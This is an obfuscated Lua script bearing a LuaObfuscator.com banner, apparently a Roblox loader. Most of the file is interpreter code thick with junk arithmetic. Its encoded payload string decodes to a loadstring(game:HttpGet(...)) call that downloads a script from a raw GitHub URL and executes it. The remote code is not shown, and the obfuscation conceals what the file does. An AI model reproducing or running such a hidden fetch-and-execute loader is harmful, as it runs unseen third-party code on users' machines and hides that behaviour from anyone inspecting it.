--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==2) then v7=table.concat;v8=table.insert;v9=math.ldexp;v0=3;end if (v0==5) then v16=nil;v16=function(v20,v21,...)local v27=0;local v28;local v29;local v30;local v31;local v32;local v33;local v34;local v35;local v36;local v37;local v38;local v39;while true do if (7==v27) then v39=function(v40,v41,v42)local v48=0;local v49;local v50;local v51;while true do if (v48==0) then v49=v40[1];v50=v40[2];v48=1;end if (v48==1) then v51=v40[3];return function(...)local v86=0;local v87;local v88;local v89;local v90;local v91;while true do if (v86==0) then v87=1;v88= -1;v86=1;end if (3==v86) then A,B=v37(v12(v91));if  not A[1] then local v111=v40[4][v87] or "?" ;error("Script error at ["   .. v111   .. "]:"   .. A[2] );else return v14(A,2,B);end break;end if (2==v86) then v91=nil;v91=function()local v101=v49;local v102=v50;local v103=v51;local v104=v37;local v105={};local v106={};local v107={};for v112=0 -0 ,v90 do if (((219 + 684)<(3623 -(21 + 53))) and (v112>=v103)) then v105[v112-v103 ]=v89[v112 + 1 ];else v107[v112]=v89[v112 + 1 + 0 ];end end local v108=(v90-v103) + 1 + 0 ;local v109;local v110;while true do local v113=0;local v114;local v115;while true do if (((3107 -(200 + 1168))>(579 -(14 + 56))) and (v113==(1735 -((685 -(161 + 16)) + 1226)))) then while true do if ((v114==(308 -(77 + 231))) or ((2370 + (3555 -(830 + 982)))<=(839 + 1091))) then v115=1755 -(536 + 1219) ;while true do if ((v115==(760 -(119 + 403 + 237))) or (3617>(2254 + 1946))) then if (((1244 + 1565)==(4039 -(153 + (2487 -1410)))) and (v110<=(7 -5))) then if ((v110<=(0 + 0)) or (238==((13602 -9429) -(1029 + 419)))) then do return;end elseif ((v110>1) or (459>(401 + 35 + 1931))) then local v142=0 + 0 ;local v143;local v144;local v145;local v146;local v147;local v148;while true do if ((v142==(4 -(1 + 0))) or ((7373 -5439)>((2288 + 1088) -((42 -22) + 1 + 12)))) then while true do if (((1280 -882)==398) and (v143==(0 + 0))) then v144=0 -0 ;v145=nil;v143=1 + 0 ;end if ((v143==(3 -1)) or ((2925 -((164 -117) + 125))>(5108 -(1483 + 51)))) then v148=nil;while true do if (((3082 + 1548)>=(14362 -10669)) and (v144==(0 + 0))) then local v180=(0 -0) -0 ;local v181;while true do if ((v180==(1748 -(768 + 980))) or ((2225 + 1830)==(7252 -3347))) then v181=0 -0 ;while true do if ((v181==(0 + (0 -0))) or ((5684 -3263)<(3071 -(382 + 687)))) then v145=v109[2];v146,v147=v104(v107[v145](v14(v107,v145 + ((4 + 0) -3) ,v109[1890 -((1893 -(989 + 822)) + (2928 -(267 + 856))) ])));v181=1291 -(1062 + 228) ;end if ((v181==((1 + 0) -0)) or ((2100 -(651 + 1027))==(1394 + 1035))) then v144=3 -2 ;break;end end break;end end end if (((4087 -(480 + (1813 -548)))>=(668 + 273)) and (1==v144)) then local v182=0 -0 ;local v183;while true do if (((1672 + 3136)>(8284 -4732)) and (v182==(0 + 0))) then v183=435 -(58 + 377) ;while true do if (((1750 -(1140 + 334))<=(455 + 2094)) and (v183==(614 -(361 + 252)))) then v144=5 -3 ;break;end if ((v183==(0 + 0)) or ((2923 -1602)>=4957)) then v88=(v147 + v145) -(2 -1) ;v148=293 -(200 + 93) ;v183=1 + 0 ;end end break;end end end if ((v144==(911 -(344 + 565))) or (625>=(12372 -8531))) then for v184=v145,v88 do local v185=(0 + 0) -0 ;local v186;while true do if ((v185==((958 + 801) -(1517 + 242))) or ((3087 -(390 + 1632))>(2 + 1151))) then v186=0 -0 ;while true do if ((v186==0) or ((1943 -(457 + 752))>=(5307 -3669))) then v148=v148 + (2 -1) ;v107[v184]=v146[v148];break;end end break;end end end break;end end break;end if (((22 + 433)<=(14101 -9837)) and (v143==(1892 -(1404 + 487)))) then local v170=0;while true do if (((342 -(1557 -(1299 + 70)))<(5267 -3457)) and (v170==(0 -0))) then v146=nil;v147=nil;v170=1 + 0 ;end if (((356 + 853)==1209) and (v170==((828 -(299 + 528)) + 0))) then v143=2 + (0 -0) ;break;end end end end break;end if (((0 -0)==v142) or ((3770 -1190)>=(1836 + 3100))) then v143=1569 -(777 + 792) ;v144=nil;v142=1;end if ((v142==(1 + 0)) or ((4459 -1392)==(4900 -(249 + 212)))) then v145=nil;v146=nil;v142=2;end if ((2==v142) or (4991<=(654 -(299 + (428 -131))))) then v147=nil;v148=nil;v142=794 -(559 + 232) ;end end else local v149=0 -0 ;local v150;local v151;while true do if (((5806 -3449)<(4399 -(796 + 19 + 134))) and (v149==(1509 -(683 + 825)))) then v107[v150 + (1 -0) ]=v151;v107[v150]=v151[v109[4]];break;end if ((v149==(1593 -(1132 + 461))) or ((6363 -(1612 + 27))<953)) then local v163=0 + 0 ;while true do if ((2058>(2526 -758)) and (v163==1)) then v149=139 -(56 + 82) ;break;end if (((1670 -(81 + 18))>(39 + 310)) and (v163==0)) then v150=v109[4 -2 ];v151=v107[v109[1167 -(691 + 473) ]];v163=2 -1 ;end end end end end elseif ((v110<=4) or ((4883 -(197 + 915))>(1183 + 3225))) then if ((v110==(2 + 1)) or ((2952 + 477)>(5038 -(933 + 92)))) then v107[v109[2]]();else v107[v109[227 -(17 + 208) ]]=v42[v109[10 -7 ]];end elseif (((63 + 305)<=(1333 -429)) and (v110>5)) then v107[v109[1 + 1 ]]=v109[3];else local v156=0 -0 ;local v157;while true do if ((1547<(10152 -5825)) and (v156==(0 + 0))) then v157=v109[1 + 1 ];v107[v157]=v107[v157](v14(v107,v157 + 1 + 0 ,v88));break;end end end v87=v87 + 1 + 0 ;break;end if ((v115==0) or ((1432 + 2456)==(5490 -3439))) then local v122=0;local v123;while true do if ((v122==(0 -(0 -0))) or ((4764 -(162 + 641))<3073)) then v123=0;while true do if ((v123==(1 -0)) or ((3704 -1166)<1236)) then v115=1;break;end if (((4462 -2691)==((3753 -(83 + 103)) -(53 + (3582 -(99 + 1740))))) and (v123==0)) then local v158=0 -0 ;while true do if (((547 -(545 + 2))==v158) or ((3058 -(86 + 578))>=(4479 -1988))) then v109=v101[v87];v110=v109[1849 -(899 + 949) ];v158=1 + 0 + 0 ;end if ((3618<=(4359 -(197 + 402))) and (v158==(1 -0))) then v123=1;break;end end end end break;end end end end break;end end break;end if ((3138==(676 + (3298 -(245 + 591)))) and (v113==(0 + (1014 -(553 + 461))))) then v114=0 + 0 ;v115=nil;v113=1 + 0 ;end end end end;v86=3;end if (v86==1) then v89={...};v90=v13("#",...) -1 ;v86=2;end end end;end end end;return v39(v38(),{},v21)(...);end if (v27==0) then v28=1;v29=nil;v20=v5(v4(v20,5),"..",function(v43)if (v2(v43,2)==79) then v29=v1(v4(v43,1,1));return "";else local v78=v3(v1(v43,16));if v29 then local v92=v6(v78,v29);v29=nil;return v92;else return v78;end end end);v27=1;end if (v27==6) then v38=nil;v38=function()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v52==1) then v55=nil;v56=nil;v52=2;end if (v52==(7 -5)) then v57=nil;v58=nil;v52=1 + 2 ;end if ((1419 -(23 + 1393))==v52) then v59=nil;v60=nil;v52=9 -5 ;end if (v52==0) then v53=1676 -(1295 + 381) ;v54=nil;v52=1;end if (v52==(69 -(27 + 38))) then while true do if (2~=v53) then else local v96=0 -0 ;while true do if (0~=v96) then else v58=nil;v59=nil;v96=1 + 0 ;end if (v96~=1) then else v53=507 -(167 + 337) ;break;end end end if (v53~=0) then else local v97=0 + 0 ;while true do if (v97~=1) then else v53=1;break;end if (v97==0) then v54=0 + 0 ;v55=nil;v97=1 + 0 ;end end end if (v53==(1 + 0)) then local v98=0;while true do if (v98~=0) then else v56=nil;v57=nil;v98=691 -(123 + 567) ;end if (v98==(1373 -(314 + 1058))) then v53=2;break;end end end if (v53==(1170 -(729 + 438))) then v60=nil;while true do local v99=0;local v100;while true do if (v99==(0 -0)) then v100=0 + 0 ;while true do if (1~=v100) then else if (v54==(2 -1)) then v58={v55,v56,nil,v57};v59=v33();v60={};v54=2;end if (2==v54) then local v121=0;while true do if (1==v121) then for v127=711 -(537 + 173) ,v33() do local v128=0 + 0 ;local v129;local v130;local v131;while true do if (v128~=1) then else v131=nil;while true do if (1==v129) then while true do if (v130~=0) then else v131=v31();if (v30(v131,1,1)==0) then local v173=0 + 0 ;local v174;local v175;local v176;local v177;local v178;while true do if (v173~=1) then else v176=nil;v177=nil;v173=1843 -(1755 + 86) ;end if (v173==(2 + 0)) then v178=nil;while true do if (v174~=2) then else while true do if (v175==0) then local v190=1226 -(642 + 584) ;while true do if (v190~=(568 -(195 + 373))) then else v176=v30(v131,1 + 1 ,1841 -(1190 + 648) );v177=v30(v131,4 -0 ,6);v190=1;end if (v190~=(801 -(6 + 794))) then else v175=1492 -(51 + 1440) ;break;end end end if (v175~=1) then else local v191=0 + 0 ;while true do if (v191~=(0 + 0)) then else v178={v32(),v32(),nil,nil};if (v176==0) then local v199=0;local v200;local v201;while true do if (v199==0) then v200=0 + 0 ;v201=nil;v199=1;end if (v199==1) then while true do if (v200==(0 + 0)) then v201=0 -0 ;while true do if (v201~=(0 + 0)) then else v178[8 -5 ]=v32();v178[4]=v32();break;end end break;end end break;end end elseif (v176==(912 -(463 + 448))) then v178[3]=v33();elseif (v176==(2 + 0)) then v178[3 -0 ]=v33() -(2^16) ;elseif (v176==(10 -7)) then local v208=0 -0 ;local v209;while true do if (v208==0) then v209=0 -0 ;while true do if (0==v209) then v178[3]=v33() -(2^(11 + 5)) ;v178[4]=v32();break;end end break;end end end v191=1;end if (v191==(346 -(146 + 199))) then v175=2;break;end end end if (v175==(1 + 1)) then local v192=0;local v193;while true do if (v192==0) then v193=1419 -(160 + 1259) ;while true do if (v193~=(1035 -(907 + 127))) then else v175=1855 -(418 + 1434) ;break;end if (v193~=0) then else if (v30(v177,1,109 -(77 + 31) )==(1 + 0)) then v178[5 -3 ]=v60[v178[2 + 0 ]];end if (v30(v177,2,5 -3 )~=(1091 -(686 + 404))) then else v178[3]=v60[v178[1 + 2 ]];end v193=1 + 0 ;end end break;end end end if (v175==3) then if (v30(v177,165 -(152 + 10) ,3)~=1) then else v178[4 + 0 ]=v60[v178[4]];end v55[v127]=v178;break;end end break;end if (v174==(93 -(6 + 87))) then local v187=0 -0 ;while true do if (v187==0) then v175=0;v176=nil;v187=139 -(17 + 121) ;end if (v187==1) then v174=1;break;end end end if (v174==(2 -1)) then local v188=0 -0 ;while true do if (v188~=1) then else v174=2 + 0 ;break;end if (v188==0) then v177=nil;v178=nil;v188=1;end end end end break;end if (v173==0) then v174=0 -0 ;v175=nil;v173=2 -1 ;end end end break;end end break;end if (v129==0) then v130=0;v131=nil;v129=2 -1 ;end end break;end if (v128==(1785 -(1493 + 292))) then v129=0;v130=nil;v128=1868 -(671 + 1196) ;end end end v54=3;break;end if (v121==0) then for v132=3 -2 ,v59 do local v133=0;local v134;local v135;local v136;local v137;while true do if (v133~=(0 + 0)) then else v134=0;v135=nil;v133=2 -1 ;end if (v133==2) then while true do if (v134==0) then v135=1153 -(1081 + 72) ;v136=nil;v134=1;end if (v134==1) then v137=nil;while true do if (v135~=0) then else local v168=0 -0 ;while true do if (v168~=(0 + 0)) then else local v179=0 + 0 ;while true do if ((1 + 0)==v179) then v168=1;break;end if (v179==0) then v136=v31();v137=nil;v179=3 -2 ;end end end if ((1 + 0)==v168) then v135=1024 -(957 + 66) ;break;end end end if (v135==(1 -0)) then if (v136==1) then v137=v31()~=(0 + 0) ;elseif (v136==2) then v137=v34();elseif (v136~=3) then else v137=v35();end v60[v132]=v137;break;end end break;end end break;end if (v133~=(2 -1)) then else v136=nil;v137=nil;v133=1 + 1 ;end end end v58[3]=v31();v121=1159 -(499 + 659) ;end end end break;end if (v100==(0 -0)) then local v120=0 -0 ;while true do if (v120==(1032 -(493 + 539))) then if (v54==3) then for v138=1 + 0 ,v33() do v56[v138-1 ]=v38();end for v140=1,v33() do v57[v140]=v33();end return v58;end if (v54==0) then local v125=0 + 0 ;local v126;while true do if (v125==0) then v126=0;while true do if (v126~=1) then else v57={};v54=1 -0 ;break;end if (v126~=(0 + 0)) then else local v159=0;while true do if (v159~=(0 -0)) then else v55={};v56={};v159=2 -1 ;end if ((3 -2)==v159) then v126=1;break;end end end end break;end end end v120=1 + 0 ;end if (v120~=(2 -1)) then else v100=1415 -(675 + 739) ;break;end end end end break;end end end break;end end break;end end end;v39=nil;v27=7;end if (v27==3) then v33=nil;v33=function()local v61=0 -0 ;local v62;local v63;local v64;local v65;while true do if (v61==((1404 -913) -(158 + 333))) then v62,v63,v64,v65=v2(v20,v28,v28 + (1295 -((2722 -1629) + 199)) );v28=v28 + (1343 -(86 + 1253)) ;v61=1;end if (v61==(1765 -(651 + 1113))) then return (v65 * (4608565 + 12168651)) + (v64 * (36198 + 29338)) + (v63 * ((2021 -(105 + 1752)) + 92)) + v62 ;end end end;v34=nil;v27=4;end if (v27==5) then v36=v33;v37=nil;v37=function(...)return {...},v13("#",...);end;v27=6;end if (v27==1) then v30=nil;v30=function(v44,v45,v46)if v46 then local v79=0 + 0 ;local v80;while true do if (v79==((48 -17) -(29 + 2))) then v80=(v44/((4 -2)^(v45-(1132 -((2566 -1828) + 393)))))%((1995 -((2798 -939) + (375 -241)))^(((v46-(1 -0)) -(v45-(233 -(225 + 7)))) + 1 + (0 -0))) ;return v80-(v80%(3 -2)) ;end end else local v81=0 + 0 ;local v82;while true do if ((0 -0)==v81) then v82=(1 + 1)^(v45-(3 -2)) ;return (((v44%(v82 + v82))>=v82) and 1) or (757 -(654 + 103)) ;end end end end;v31=nil;v27=2;end if (v27==2) then v31=function()local v66=v2(v20,v28,v28);v28=v28 + 1 ;return v66;end;v32=nil;v32=function()local v67,v68=v2(v20,v28,v28 + (367 -(297 + 68)) );v28=v28 + (2 -0) ;return (v68 * 256) + v67 ;end;v27=3;end if (4==v27) then v34=function()local v69=v33();local v70=v33();local v71=1 + 0 ;local v72=(v30(v70,2 -1 ,20) * (2^(15 + 17))) + v69 ;local v73=v30(v70,21,(1611 -(453 + 522)) -(111 + 494) );local v74=((v30(v70,65 -33 )==(524 -(371 + 152))) and  -1) or 1 ;if (v73==(708 -((2267 -(898 + 1092)) + 431))) then if (v72==(0 + 0)) then return v74 * (0 + 0) ;else v73=1 -0 ;v71=629 -((821 -410) + 218) ;end elseif (v73==((4184 -3221) + 1084)) then return ((v72==(0 + 0)) and (v74 * ((1 + 0)/(0 -0)))) or (v74 * NaN) ;end return v9(v74,v73-1023 ) * (v71 + (v72/(((6 -4) -0)^(278 -(84 + 142))))) ;end;v35=nil;v35=function(v47)local v75=(0 -0) + 0 ;local v76;local v77;while true do if (v75==(1527 -(696 + 828))) then return v7(v77);end if (v75==((13 -8) -3)) then v77={};for v93=3 -(909 -(387 + 520)) , #v76 do v77[v93]=v3(v2(v4(v76,v93,v93)));end v75=3;end if (v75==(1573 -(1412 + 161))) then v76=nil;if  not v47 then local v95=0 -0 ;while true do if (v95==0) then v47=v33();if (v47==0) then return "";end break;end end end v75=(4 -3) + 0 ;end if (v75==(2 -1)) then v76=v4(v20,v28,(v28 + v47) -(1 + 0) );v28=v28 + v47 ;v75=457 -(90 + 365) ;end end end;v27=5;end end end;v16("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033C3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C305349582F6C6F7369782F6D61696E2F79652532306D61696E00083O0012043O00013O001204000100023O002001000100010003001206000300044O0002000100034O00055O00022O00033O000100016O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v10(),...);break;end if (1==v0) then v4=string.sub;v5=string.gsub;v6=string.rep;v0=2;end if (v0==4) then v13=select;v14=unpack or table.unpack ;v15=tonumber;v0=5;end if (v0==3) then v10=getfenv or function()return _ENV;end ;v11=setmetatable;v12=pcall;v0=4;end if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v0=1;end end end
